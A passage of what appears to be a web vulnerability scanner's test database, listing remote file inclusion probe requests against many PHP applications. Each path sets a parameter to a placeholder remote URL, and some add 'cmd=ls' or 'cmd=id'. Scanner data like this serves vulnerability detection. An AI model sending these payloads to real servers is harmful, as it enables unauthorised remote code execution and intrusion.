(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005257\",\"5292\",\"c\",\"/library/translation.inc.php?GLOBALS[srcdir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005258\",\"5292\",\"c\",\"/libs/db.php?path_local=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005259\",\"5292\",\"c\",\"/libs/ftp.php?path_local=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005260\",\"5292\",\"c\",\"/libs/lom.php?ETCDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005261\",\"5292\",\"c\",\"/libsecure.php?abs_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005262\",\"5292\",\"c\",\"/license.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005263\",\"5292\",\"c\",\"/link_main.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005264\",\"5292\",\"c\",\"/linkadmin.php?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005265\",\"5292\",\"c\",\"/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005266\",\"5292\",\"c\",\"/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005267\",\"5292\",\"c\",\"/list.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005268\",\"5292\",\"c\",\"/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005269\",\"5292\",\"c\",\"/lms_path/modules/welcome.php?_LIB_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005270\",\"5292\",\"c\",\"/load_lang.php?_SERWEB[configdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005271\",\"5292\",\"c\",\"/load_lang.php?_SERWEB[serwebdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005272\",\"5292\",\"c\",\"/load_phplib.php?_PHPLIB[libdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005273\",\"5292\",\"c\",\"/loader.php?GLOBALS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005274\",\"5292\",\"c\",\"/local/lib/lcUser.php?LIBDIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005275\",\"5292\",\"c\",\"/log.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005276\",\"5292\",\"c\",\"/login.php3?cl_headers=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005277\",\"5292\",\"c\",\"/login.php?base_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005278\",\"5292\",\"c\",\"/login.php?blog_theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005279\",\"5292\",\"c\",\"/login.php?langfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005280\",\"5292\",\"c\",\"/login.php?pachtofile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005281\",\"5292\",\"c\",\"/login.php?srcdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005282\",\"5292\",\"c\",\"/login.php?value=@RFIURL??\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005283\",\"5292\",\"c\",\"/lovecms/install/index.php?step=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005284\",\"5292\",\"c\",\"/m2f/m2f_cron.php?m2f_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005285\",\"5292\",\"c\",\"/m2f/m2f_forum.php?m2f_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005286\",\"5292\",\"c\",\"/m2f/m2f_mailinglist.php?m2f_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005287\",\"5292\",\"c\",\"/m2f/m2f_phpbb204.php?m2f_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005288\",\"5292\",\"c\",\"/maguz.php?site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005289\",\"5292\",\"c\",\"/mail/childwindow.inc.php?form=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005290\",\"5292\",\"c\",\"/mail/childwindow.inc.php?form=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005291\",\"5292\",\"c\",\"/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005292\",\"5292\",\"c\",\"/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005293\",\"5292\",\"c\",\"/mail_this_entry/mail_autocheck.php?pm_path=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005294\",\"5292\",\"c\",\"/main.inc.php?pathtoscript=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005295\",\"5292\",\"c\",\"/main.php?config[search_disp]=true&include_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005296\",\"5292\",\"c\",\"/main.php?id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005297\",\"5292\",\"c\",\"/main.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005298\",\"5292\",\"c\",\"/main.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005299\",\"5292\",\"c\",\"/main.php?pageURL=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005300\",\"5292\",\"c\",\"/main.php?pagina=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005301\",\"5292\",\"c\",\"/main/forum/komentar.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005302\",\"5292\",\"c\",\"/main/main.php?pi=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005303\",\"5292\",\"c\",\"/main/ppcbannerclick.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005304\",\"5292\",\"c\",\"/main/ppcclick.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005305\",\"5292\",\"c\",\"/main_prepend.php?_SERWEB[functionsdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005306\",\"5292\",\"c\",\"/mainpage.php?docroot=@RFIURL?cmd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005307\",\"5292\",\"c\",\"/mamboleto.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005308\",\"5292\",\"c\",\"/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005309\",\"5292\",\"c\",\"/manage_songs.php?foing_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005310\",\"5292\",\"c\",\"/manager/admin/index.php?MGR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005311\",\"5292\",\"c\",\"/manager/admin/p_ins.php?MGR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005312\",\"5292\",\"c\",\"/manager/admin/u_ins.php?MGR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005313\",\"5292\",\"c\",\"/manager/articles.php?_PX_config[manager_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005314\",\"5292\",\"c\",\"/manager/static/view.php?propID=0&INC=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005315\",\"5292\",\"c\",\"/master.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005316\",\"5292\",\"c\",\"/mcNews/admin/header.php?skinfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005317\",\"5292\",\"c\",\"/mcf.php?content=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005318\",\"5292\",\"c\",\"/mcnews/admin/install.php?l=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005319\",\"5292\",\"c\",\"/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005320\",\"5292\",\"c\",\"/member.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005321\",\"5292\",\"c\",\"/member.php?vwar_root=@RFIURL&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005322\",\"5292\",\"c\",\"/member/usercp_menu.php?script_folder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005323\",\"5292\",\"c\",\"/members/index.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005324\",\"5292\",\"c\",\"/members/registration.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005325\",\"5292\",\"c\",\"/members_help.php?hlp=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005326\",\"5292\",\"c\",\"/membres/membreManager.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005327\",\"5292\",\"c\",\"/menu.php3?cl_headers=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005328\",\"5292\",\"c\",\"/menu.php?functions_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005329\",\"5292\",\"c\",\"/mep/frame.php?chem=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005330\",\"5292\",\"c\",\"/microcms/includes/file_manager/special.php?fm_includes_special=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005331\",\"5292\",\"c\",\"/middle.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005332\",\"5292\",\"c\",\"/migrateNE2toNE3.php?_NE[AbsPath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005333\",\"5292\",\"c\",\"/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005334\",\"5292\",\"c\",\"/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005335\",\"5292\",\"c\",\"/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005336\",\"5292\",\"c\",\"/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005337\",\"5292\",\"c\",\"/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005338\",\"5292\",\"c\",\"/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005339\",\"5292\",\"c\",\"/mini-pub.php/front-end/img.php?sFileName=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005340\",\"5292\",\"c\",\"/minimal/wiki.php?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005341\",\"5292\",\"c\",\"/misc/function.php3?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005342\",\"5292\",\"c\",\"/mitglieder.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005343\",\"5292\",\"c\",\"/mkportal/include/user.php?MK_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005344\",\"5292\",\"c\",\"/mkportal/include/user.php?MK_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005345\",\"5292\",\"c\",\"/mod/authent.php4?rootpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005346\",\"5292\",\"c\",\"/mod/image/index.php?config[pathMod]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005347\",\"5292\",\"c\",\"/mod/liens/index.php?config[pathMod]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005348\",\"5292\",\"c\",\"/mod/liste/index.php?config[pathMod]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005349\",\"5292\",\"c\",\"/mod/special/index.php?config[pathMod]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005350\",\"5292\",\"c\",\"/mod/texte/index.php?config[pathMod]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005351\",\"5292\",\"c\",\"/mod_membre/inscription.php?chemin=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005352\",\"5292\",\"c\",\"/mod_phpalbum/sommaire_admin.php?chemin=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005353\",\"5292\",\"c\",\"/modernbill/include/html/config.php?DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005354\",\"5292\",\"c\",\"/modifyform.html?code=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005355\",\"5292\",\"c\",\"/mods/business_functions.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005356\",\"5292\",\"c\",\"/mods/config/load.inc.php?moddir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005357\",\"5292\",\"c\",\"/mods/http/load.inc.php?moddir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005358\",\"5292\",\"c\",\"/mods/ui_functions.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005359\",\"5292\",\"c\",\"/module/forum/forum.php?fd=@RFIURL=';\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005360\",\"5292\",\"c\",\"/module/forum/main.php?id=1&main_dir=@RFIURL?&\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005361\",\"5292\",\"c\",\"/modules.php?name=@RFIURL&file=article&sid=2\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005362\",\"5292\",\"c\",\"/modules/4nAlbum/public/displayCategory.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005363\",\"5292\",\"c\",\"/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005364\",\"5292\",\"c\",\"/modules/Calendar/admin/update.php?calpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005365\",\"5292\",\"c\",\"/modules/Calendar/calendar.php?calpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005366\",\"5292\",\"c\",\"/modules/Calendar/scheme.php?calpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005367\",\"5292\",\"c\",\"/modules/Discipline/CategoryBreakdownTime.php?FocusPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005368\",\"5292\",\"c\",\"/modules/Discipline/CategoryBreakdownTime.php?staticpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005369\",\"5292\",\"c\",\"/modules/Discipline/StudentFieldBreakdown.php?staticpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005370\",\"5292\",\"c\",\"/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005371\",\"5292\",\"c\",\"/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005372\",\"5292\",\"c\",\"/modules/My_eGallery/index.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005373\",\"5292\",\"c\",\"/modules/My_eGallery/public/displayCategory.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005374\",\"5292\",\"c\",\"/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 